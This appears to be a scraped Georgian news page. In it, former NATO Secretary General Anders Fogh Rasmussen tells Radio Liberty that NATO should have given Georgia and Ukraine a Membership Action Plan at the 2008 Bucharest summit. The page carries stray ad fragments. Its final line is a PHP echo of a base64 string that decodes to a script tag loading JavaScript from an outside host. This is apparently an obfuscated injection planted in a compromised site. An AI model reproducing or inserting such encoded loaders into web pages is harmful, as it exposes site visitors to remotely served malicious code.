celsiusi
ავერსი საქკაბელი
NATO-ს ყოფილი გენერალური მდივანი, ანდერს ფოგ რასმუსენი უკრაინაში მიმდინარე მოვლენებს ეხმაურება და ომის პარალელურად წარსულის მოვლენებსაც იხსენებს. მან ისაუბრა ბუქარესტის სამიტის შესახებ, რომელზეც საქართველოსა და უკრაინისთვის MAP-ის მიცემა განიხილებოდა.
 
"2008 წელს ბუქარესტში საქართველოსა და უკრაინას MAP-ი არ მივეცით, მაგრამ დავპირდით, რომ გახდებოდნენ NATO-ს წევრები, შემდეგ დავიწყეთ ამაზე მუშაობა, შევქმენით NATO - უკრაინის და NATO-საქართველოს კომისიები.
 
ანუ, MAP-ით გათვალისწინებული პროცესის ნაცვლად, წინსვლის სხვა გზა ავირჩიეთ. მაგრამ დღევანდელი გადმოსახედიდან, ვფიქრობ, რომ ეს არასწორი არჩევანი იყო. თბილისისა და კიევისთვის MAP-ი იქ, ბუქარესტშივე უნდა მიგვეცა. ეს არ გავაკეთეთ, ეს კი სიგნალი იყო პუტინისთვის, რომ NATO-ში უთანხმოებაა. მან ეს სისუსტე გამოიყენა და მალევე შემოიჭრა კიდეც საქართველოში,"- ამბობს რასმუსენი "რადიო თავისუფლებასთან" ინტერვიუს დროს.
792
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");